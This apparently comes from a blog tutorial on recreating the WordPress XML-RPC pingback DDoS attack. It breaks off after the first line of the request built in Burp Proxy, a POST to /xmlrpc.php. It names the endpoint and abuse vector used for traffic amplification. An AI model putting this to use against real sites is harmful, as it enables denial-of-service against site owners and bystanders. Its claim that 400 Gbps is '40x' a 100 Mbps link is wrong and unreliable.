WordPress XMLRPC.php DDOS Attack
The Bigger They Come, The Harder They Fall
Earlier this year a vulnerability was exploited which used the PingBack feature in WordPress. I am going to show how to create a request to recreate the attack. The attack send upwards of 400 Gbps through the internet. By comparison you’re home network is, on a good day, theoretically 100 Mbps. This attack pumped 40x more traffic than your home network can ever do.
I created the request in BURP PROXY:
POST /xmlrpc.php HTTP/1.0